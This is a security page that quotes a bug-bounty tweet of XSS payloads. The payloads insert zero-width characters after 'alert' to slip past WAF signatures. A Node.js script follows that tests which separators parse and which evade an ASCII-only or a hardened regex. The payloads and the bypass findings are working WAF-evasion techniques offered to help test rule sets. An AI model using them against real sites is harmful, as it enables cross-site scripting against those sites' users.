A tip for bypassing XSS WAF protection by placing invisible separators before or after a function name, for example between alert and its argument list. The payloads use zero-width characters such as U+FEFF, U+200B, U+200C, U+200D, U+2060 and U+180E. A separator only yields a working bypass when the browser's JavaScript parser accepts it but the WAF's signature does not: ECMAScript treats U+FEFF (and any Zs space or line terminator) as whitespace, rejects U+200B and U+2060 as invalid tokens, and reads U+200C and U+200D as part of the identifier, so each candidate should be confirmed in a real engine rather than assumed to work. Security professionals should know these techniques in order to test the effectiveness of WAF protections.
Bug Bounty Tip
Bypass XSS WAF protection using invisible separators before or after function name
<script>alert\uFEFF(1)</script>
<img/src/onerror= alert(1)>
<svg/onload=alert⁠(1)>
<img/src/onerror=a​lert(1)>
<script>alert (1)</script>
pic.twitter.com/bPmTBw7yXn
— ./Mr-Dark (@Mr_Dark55) June 26, 2024
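As an added example (not the tweet author's code), the following Node.js script checks each separator from the tip in two ways: whether a JavaScript engine actually accepts alert, separator, (1) as a function call, and whether two constructed WAF-style signatures match the payload. Both signatures are models written for this example, not rules taken from any real WAF: one skips only ASCII whitespace, the other also skips Unicode whitespace and format (Cf) characters. The payload runs with alert bound to a recorder, so nothing pops up and a parse failure can be told apart from a runtime failure and from a successful call.

```javascript
// Added example for this page; constructed test data, not code from the tweet.
// Candidate separators from the tip, plus two ECMAScript whitespace characters
// (U+2028 line separator, U+00A0 no-break space) for comparison.
const SEPARATORS = {
  'U+FEFF': '\uFEFF', // zero width no-break space: ECMAScript WhiteSpace
  'U+200B': '\u200B', // zero width space: Cf, neither whitespace nor identifier char
  'U+200C': '\u200C', // zero width non-joiner: allowed inside identifiers
  'U+200D': '\u200D', // zero width joiner: allowed inside identifiers
  'U+2060': '\u2060', // word joiner: Cf, not whitespace
  'U+180E': '\u180E', // Mongolian vowel separator: whitespace only in pre-Unicode-6.3 tables
  'U+2028': '\u2028', // line separator: ECMAScript LineTerminator
  'U+00A0': '\u00A0', // no-break space: Zs, ECMAScript WhiteSpace
};

// Constructed model of a signature that only skips ASCII whitespace, the way a
// regex engine whose \s is ASCII-only would behave. Not a real WAF rule.
const ASCII_SIGNATURE = /alert[ \t\r\n\f\v]*\(/i;

// Constructed hardened variant: also skips Unicode whitespace and any
// format (Cf) character between the callee and the opening parenthesis.
const HARDENED_SIGNATURE = /alert[\s\p{Cf}]*\(/iu;

function buildPayload(sep) {
  return `alert${sep}(1)`;
}

// Returns 'syntax-error' if the engine refuses to parse the payload,
// 'reference-error' if it parses but the callee name no longer resolves
// (the separator became part of the identifier), 'executed' if alert ran.
function runPayload(src) {
  let called = false;
  const recorder = () => { called = true; };
  let fn;
  try {
    fn = new Function('alert', src); // parse only; nothing runs yet
  } catch (e) {
    return 'syntax-error';
  }
  try {
    fn(recorder); // run with alert bound to the recorder
  } catch (e) {
    return e instanceof ReferenceError ? 'reference-error' : 'runtime-error';
  }
  return called ? 'executed' : 'no-call';
}

function evaluateSeparator(sep) {
  const payload = buildPayload(sep);
  return {
    engine: runPayload(payload),
    asciiSignatureMatches: ASCII_SIGNATURE.test(payload),
    hardenedSignatureMatches: HARDENED_SIGNATURE.test(payload),
  };
}

// A bypass is only real when the engine executes the call AND the signature misses it.
function isBypass(sep, signature = ASCII_SIGNATURE) {
  const payload = buildPayload(sep);
  return runPayload(payload) === 'executed' && !signature.test(payload);
}

function report() {
  const rows = {};
  for (const [name, sep] of Object.entries(SEPARATORS)) {
    const r = evaluateSeparator(sep);
    rows[name] = {
      engine: r.engine,
      asciiSig: r.asciiSignatureMatches ? 'blocked' : 'missed',
      hardenedSig: r.hardenedSignatureMatches ? 'blocked' : 'missed',
      bypassVsAscii: isBypass(sep),
    };
  }
  console.table(rows);
}

report();
```

Running this under Node shows that U+FEFF, U+2028 and U+00A0 execute while slipping past the ASCII-only signature; U+200B and U+2060 are rejected by the parser; U+200C and U+200D parse but fail with a ReferenceError because the zero-width joiner is swallowed into the identifier. The hardened signature catches every row, which is the check worth running against a WAF rule set before trusting it.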